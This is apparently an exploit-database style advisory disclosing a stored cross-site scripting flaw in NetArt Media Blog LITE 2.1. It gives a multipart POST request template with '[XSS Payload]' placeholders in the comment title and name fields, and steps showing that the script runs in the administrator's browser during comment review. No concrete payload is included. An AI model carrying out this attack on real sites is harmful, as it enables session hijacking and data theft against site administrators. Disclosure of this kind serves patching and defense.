Author : CraCkEr Website : https://www.netartmedia.net/blog-lite Vendor : NetArt Media Software : Blog LITE 2.1 Vuln Type: Stored XSS Impact : Manipulate the content of the site Release Notes: Allow Attacker to inject malicious code into website, give ability to steal sensitive information, manipulate data, and launch additional attacks. Greets: The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL, MoizSid09 CryptoJob (Twitter) twitter.com/0x0CryptoJob ## Stored XSS --------------------------------------------------------- POST /blog/index.php HTTP/2 -----------------------------401019026540470155022776857270 Content-Disposition: form-data; name="title" [XSS Payload] -----------------------------401019026540470155022776857270 Content-Disposition: form-data; name="content" -----------------------------401019026540470155022776857270 Content-Disposition: form-data; name="author" [XSS Payload] -----------------------------401019026540470155022776857270 Content-Disposition: form-data; name="email" -----------------------------401019026540470155022776857270 ## Steps to Reproduce: 1. Visit Any Category on the Blog 2. Write a comment (as Guest) 3. Inject your [XSS Payload] in "Comment Title" 4. Inject your [XSS Payload] in "Your Name" 5. Submit 6. By default the Blog Disable your comment for Admin Check 7. Admin Check the [BLOG POSTS] in the Administration Panel on this Path (https://website/blog/admin/index.php?page=posts) 8. When the Admin check the comments on this Path (https://website/blog/admin/index.php?page=comments&id=2) 9. XSS Will Fire and Executed on his Browser [-] Done © CraCkEr 2023